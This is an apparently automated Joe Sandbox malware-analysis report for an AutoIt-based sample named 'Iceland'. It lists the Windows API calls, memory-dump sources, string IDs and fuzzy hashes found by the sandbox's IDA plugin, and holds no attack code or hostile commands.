                                                                                                                                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 00A3F6F4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A9DB75
                                                                                                                                                                                                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A9DB7F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                • String ID: |
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 00AB40BD
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00AB40F8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                • String ID: static
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00AB50BD
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AB50D2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID: '
                                                                                                                                                                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                • Opcode ID: fe6c1696e194c7a6ce542fb7d62a45a53620fd9135e03a4cce3aad26ba049c02
                                                                                                                                                                                                                                                                • Instruction ID: 4744b787c065ac88aafbd6e066ecf2bdd2da76094e2f5c631c738697cef4068d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe6c1696e194c7a6ce542fb7d62a45a53620fd9135e03a4cce3aad26ba049c02
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9831F874E0160A9FDB14DFA9C981BEE7BB9FF49300F10416AE904AB352D771A945CF90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00AB3D18
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AB3D23
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID: Combobox
                                                                                                                                                                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                                                • Opcode ID: 5d400ef9c9fb43bd482fd739e9ae22ebc9f300ac14b860040acb83ec9020bac1
                                                                                                                                                                                                                                                                • Instruction ID: 22cdf6f37a5f845165255743b726a6dcc7a345230452f3c0d9ccdb0d51d8f343
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d400ef9c9fb43bd482fd739e9ae22ebc9f300ac14b860040acb83ec9020bac1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A1190726002086FEF118F94DC81FEB3B6EEB853A4F104524F91997292DA719D5187A0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A278B1
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27873: GetStockObject.GDI32(00000011), ref: 00A278C5
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A278CF
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00AB4216
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000012), ref: 00AB4230
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                • String ID: static
                                                                                                                                                                                                                                                                • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                • Opcode ID: 05d1fa78d30012239f5bb13f096f960dfc9c1313ab2bc101edf5efe96714d0fa
                                                                                                                                                                                                                                                                • Instruction ID: 2c68d5371438042e1b3c28ccfe7700499a8adb6cea59b5854c69ded2a102f1f0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05d1fa78d30012239f5bb13f096f960dfc9c1313ab2bc101edf5efe96714d0fa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4811F372610209AFDB01DFB8CC45AFE7BB8EF08354F014A29F955E3252E675E851EB60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A9D7C2
                                                                                                                                                                                                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A9D7EB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                • String ID: <local>
                                                                                                                                                                                                                                                                • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                • Opcode ID: 1e4dde3672b8ff7f9f5bc26bd71d4b8117599b62d2b0148a3bf1380ad58a247f
                                                                                                                                                                                                                                                                • Instruction ID: 879996a73d188ff36feca4e1ae9656c2a90aa2bd722ded3d7e6d3f48da38757f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e4dde3672b8ff7f9f5bc26bd71d4b8117599b62d2b0148a3bf1380ad58a247f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 071186717456327DDB344BE68C85EE7BEEDEB127A4F104226B50993180D6649880D6F0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,?,?), ref: 00A8761D
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A87629
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                • String ID: STOP
                                                                                                                                                                                                                                                                • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00A845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A84620
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A82699
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00A845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A84620
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00A82593
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00A845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A84620
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00A82615
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00A845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A84620
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00A82720
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00A8146F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A3FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A410E2,?,?,?,00A2100A), ref: 00A3FAD9
                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,00A2100A), ref: 00A410E6
                                                                                                                                                                                                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A2100A), ref: 00A410F5
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A410F0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00A939F0
                                                                                                                                                                                                                                                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00A93A05
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                • String ID: aut
                                                                                                                                                                                                                                                                • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AB2DC8
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AB2DDB
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8F292: Sleep.KERNEL32 ref: 00A8F30A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AB2E08
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000), ref: 00AB2E0F
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8F292: Sleep.KERNEL32 ref: 00A8F30A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00A5C213
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A5C221
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A5C27C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1717984340-0